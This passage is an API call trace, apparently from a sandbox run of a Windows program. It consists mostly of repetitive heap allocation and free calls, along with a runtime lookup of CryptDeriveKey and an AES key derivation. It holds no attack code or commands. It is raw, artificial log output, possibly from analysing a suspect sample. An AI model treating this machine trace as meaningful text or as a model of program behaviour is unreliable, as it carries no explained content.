hHeap=0x650000, dwFlags=0x0, lpMem=0x76e018 | out: hHeap=0x650000) returned 1 [0075.349] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0075.349] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0075.349] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0075.349] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.349] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0075.349] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0075.349] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.349] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0075.349] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.349] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.349] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb398 | out: hHeap=0x650000) returned 1 [0075.349] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0075.349] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dcc0 | out: hHeap=0x650000) returned 1 [0075.349] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e390 | out: hHeap=0x650000) returned 1 [0075.349] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.349] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0075.349] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0075.349] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0075.349] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e360 | out: hHeap=0x650000) returned 1 [0075.349] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0075.349] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b168 | out: hHeap=0x650000) returned 1 [0075.349] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0075.349] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e2e8 | out: hHeap=0x650000) returned 1 [0075.349] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6d8 | out: hHeap=0x650000) returned 1 [0075.349] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e108 | out: hHeap=0x650000) returned 1 [0075.349] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0075.349] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.349] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68b480 | out: hHeap=0x650000) returned 1 [0075.349] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9768 | out: hHeap=0x650000) returned 1 [0075.349] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e438 | out: hHeap=0x650000) returned 1 [0075.349] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e060 | out: hHeap=0x650000) returned 1 [0075.349] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e660 | out: hHeap=0x650000) returned 1 [0075.349] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0075.349] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0075.350] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.350] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e348 | out: hHeap=0x650000) returned 1 [0075.350] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0075.350] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.350] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad60 | out: hHeap=0x650000) returned 1 [0075.350] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0075.350] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0075.350] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e708 | out: hHeap=0x650000) returned 1 [0075.350] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0075.350] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e150 | out: hHeap=0x650000) returned 1 [0075.350] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0075.350] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x792238 | out: hHeap=0x650000) returned 1 [0075.350] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0075.350] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb568 | out: hHeap=0x650000) returned 1 [0075.350] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a0e20 | out: hHeap=0x650000) returned 1 [0075.350] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.350] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.350] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.350] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0075.350] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.350] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb568 | out: hHeap=0x650000) returned 1 [0075.350] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8af8 | out: hHeap=0x650000) returned 1 [0075.350] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.350] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0075.350] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.350] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.350] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.350] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0075.350] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0075.350] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.350] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.350] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.350] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.351] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0075.351] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da40 | out: hHeap=0x650000) returned 1 [0075.351] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.351] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.351] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.351] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0075.351] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0075.351] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.351] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.351] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.351] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.351] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dcc0 | out: hHeap=0x650000) returned 1 [0075.351] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.351] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.351] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.351] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.351] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.351] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.351] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0075.351] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.351] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0075.351] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.351] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0075.351] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.351] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0075.351] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0075.351] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0075.351] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.351] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0075.351] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb398 | out: hHeap=0x650000) returned 1 [0075.351] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0075.351] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.352] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0075.352] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.352] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0075.352] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.352] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0075.352] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.352] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0075.352] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.352] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0075.352] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.352] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0075.352] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x76e180, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0075.352] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0075.352] GetProcAddress (hModule=0x77710000, lpProcName="CryptDeriveKey") returned 0x77753188 [0075.352] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0075.352] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.352] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.352] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.352] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4f8 | out: hHeap=0x650000) returned 1 [0075.352] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb628 | out: hHeap=0x650000) returned 1 [0075.352] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.352] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da40 | out: hHeap=0x650000) returned 1 [0075.352] CryptDeriveKey (in: hProv=0x696ad0, Algid=0x660e, hBaseData=0x6b8b38, dwFlags=0x1, phKey=0x61e2c0 | out: phKey=0x61e2c0*=0x6b8af8) returned 1 [0075.352] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb628 [0075.352] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792238 [0075.352] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0075.352] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abc8 [0075.352] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e180 [0075.352] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0075.352] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5b8 [0075.353] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0075.353] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.353] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0075.353] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e180 [0075.353] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0075.353] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e390 [0075.353] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5b8 [0075.353] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e390 | out: hHeap=0x650000) returned 1 [0075.353] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.353] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0075.353] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0075.353] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e390 [0075.353] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1c8 [0075.353] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5b8 [0075.353] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0075.353] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.353] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e390 | out: hHeap=0x650000) returned 1 [0075.353] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e390 [0075.353] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1c8 [0075.353] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0075.353] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5b8 [0075.353] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0075.353] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.353] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0075.353] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1c8 [0075.353] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0075.353] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfa0 [0075.353] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5b8 [0075.353] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfa0 | out: hHeap=0x650000) returned 1 [0075.353] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.353] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0075.354] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0075.354] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfa0 [0075.354] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e468 [0075.354] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5b8 [0075.354] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0075.354] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.354] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfa0 | out: hHeap=0x650000) returned 1 [0075.354] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.354] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0075.354] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb398 | out: hHeap=0x650000) returned 1 [0075.354] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.354] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.354] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dcc0 | out: hHeap=0x650000) returned 1 [0075.354] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e360 | out: hHeap=0x650000) returned 1 [0075.354] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.354] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e150 | out: hHeap=0x650000) returned 1 [0075.354] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e708 | out: hHeap=0x650000) returned 1 [0075.354] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0075.354] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0075.354] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0075.354] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e348 | out: hHeap=0x650000) returned 1 [0075.354] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad60 | out: hHeap=0x650000) returned 1 [0075.354] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.354] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0075.354] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0075.354] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e660 | out: hHeap=0x650000) returned 1 [0075.354] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.354] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb628 [0075.354] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a10b0 [0075.354] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb428 [0075.354] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.354] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.355] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb628 [0075.355] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb428 [0075.355] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.355] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb628 [0075.355] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.355] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb628 [0075.355] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb428 [0075.355] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9708 [0075.355] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.355] PeekMessageW (in: lpMsg=0x61e3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3fc) returned 0 [0075.355] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb428 [0075.355] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb568 [0075.355] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.355] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0075.355] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb428 [0075.355] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb568 [0075.355] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5e8 [0075.355] CryptDestroyHash (hHash=0x6b8b38) returned 1 [0075.355] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb638 [0075.355] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0075.355] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3b8 [0075.355] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0075.356] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5e8 [0075.356] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfd0 [0075.356] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb428 [0075.356] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.356] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb638 [0075.356] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dcc0 [0075.356] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad60 [0075.356] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3b8 [0075.356] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.356] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5f8 [0075.356] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a10b0 [0075.356] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb378 [0075.356] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.356] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.356] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.356] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5f8 [0075.356] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd88 [0075.356] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e000 [0075.356] RtlAllocateHeap 